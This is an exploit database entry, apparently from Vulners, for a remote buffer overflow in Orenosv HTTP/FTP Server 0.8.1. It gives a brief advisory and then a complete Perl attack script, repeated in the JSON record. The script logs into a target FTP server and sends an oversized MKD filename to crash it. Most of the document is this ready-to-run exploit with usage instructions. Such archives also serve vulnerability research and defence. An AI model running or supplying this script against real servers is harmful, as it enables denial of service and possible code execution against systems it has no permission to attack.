Search...

Orenosv HTTPFTP Server 0.8.1 - FTP Commands Remote Buffer Overflow

2008-05-08T00:00:00

ID EXPLOITPACK:A9502E99848B07892C8B0F41CDF5AF32
Type exploitpack
Reporter Samsta
Modified 2008-05-08T00:00:00

Description

Orenosv HTTPFTP Server 0.8.1 - FTP Commands Remote Buffer Overflow

                                        
                                            source: https://www.securityfocus.com/bid/13546/info

The FTP server shipped with Orenosv HTTP/FTP is prone to a remote buffer-overflow vulnerability.

This issue presents itself when the application handles excessive values supplied as filenames through various FTP commands.

A successful attack may corrupt memory, cause a denial of service, or execute arbitrary code.

Orenosv HTTP/FTP Server 0.8.1 is reportedly vulnerable; other versions may be affected as well. 

#!/usr/bin/perl
use IO::Socket;

$target = shift || useage ();
$port = shift || useage ();
$user = shift || useage ();
$pass = shift || useage ();

print"[*] Connecting to $target on port $port\n";
my $sock = IO::Socket::INET -&gt; new
(
Proto =&gt; 'tcp',
PeerAddr =&gt; $target,
PeerPort =&gt; $port
)or die ("Cannot Connect, Have you already DoSed It?\n");
print"[*] Connected, Logging In...\n";
sleep 3;
$sock -&gt; send ("USER $user\r\n");
sleep 3;
$sock -&gt; send ("PASS $pass\r\n");
while ($data = &lt;$sock&gt;)
{
  if ($data =~ /230/)
  {
    print"[*] Logged In\n";
    last;
  }
}
print"[*] Creating 512-byte Buffer\n";
$buffer = 'A' x 512;
print"[*] Sending Exploit\n";
$sock -&gt; send ("MKD $buffer\r\n");
print"[*] Exploit Sent\n";
exit;

sub useage ()
{
  print "Useage: $0 &lt;Host&gt; &lt;Port&gt; &lt;Username&gt; &lt;Password&gt;\n";
  exit;
}
#Coded By Samsta http://theshelljunkies.clawz.com

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:40", "references": [], "description": "\nOrenosv HTTPFTP Server 0.8.1 - FTP Commands Remote Buffer Overflow", "edition": 1, "reporter": "Samsta", "exploitpack": {"type": "dos", "platform": "windows"}, "published": "2008-05-08T00:00:00", "title": "Orenosv HTTPFTP Server 0.8.1 - FTP Commands Remote Buffer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.8}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-05-08T00:00:00", "id": "EXPLOITPACK:A9502E99848B07892C8B0F41CDF5AF32", "href": "", "viewCount": 2, "sourceData": "source: https://www.securityfocus.com/bid/13546/info\n\nThe FTP server shipped with Orenosv HTTP/FTP is prone to a remote buffer-overflow vulnerability.\n\nThis issue presents itself when the application handles excessive values supplied as filenames through various FTP commands.\n\nA successful attack may corrupt memory, cause a denial of service, or execute arbitrary code.\n\nOrenosv HTTP/FTP Server 0.8.1 is reportedly vulnerable; other versions may be affected as well. \n\n#!/usr/bin/perl\nuse IO::Socket;\n\n$target = shift || useage ();\n$port = shift || useage ();\n$user = shift || useage ();\n$pass = shift || useage ();\n\nprint\"[*] Connecting to $target on port $port\\n\";\nmy $sock = IO::Socket::INET -> new\n(\nProto => 'tcp',\nPeerAddr => $target,\nPeerPort => $port\n)or die (\"Cannot Connect, Have you already DoSed It?\\n\");\nprint\"[*] Connected, Logging In...\\n\";\nsleep 3;\n$sock -> send (\"USER $user\\r\\n\");\nsleep 3;\n$sock -> send (\"PASS $pass\\r\\n\");\nwhile ($data = <$sock>)\n{\n if ($data =~ /230/)\n {\n print\"[*] Logged In\\n\";\n last;\n }\n}\nprint\"[*] Creating 512-byte Buffer\\n\";\n$buffer = 'A' x 512;\nprint\"[*] Sending Exploit\\n\";\n$sock -> send (\"MKD $buffer\\r\\n\");\nprint\"[*] Exploit Sent\\n\";\nexit;\n\nsub useage ()\n{\n print \"Useage: $0 <Host> <Port> <Username> <Password>\\n\";\n exit;\n}\n#Coded By Samsta http://theshelljunkies.clawz.com", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645521039}}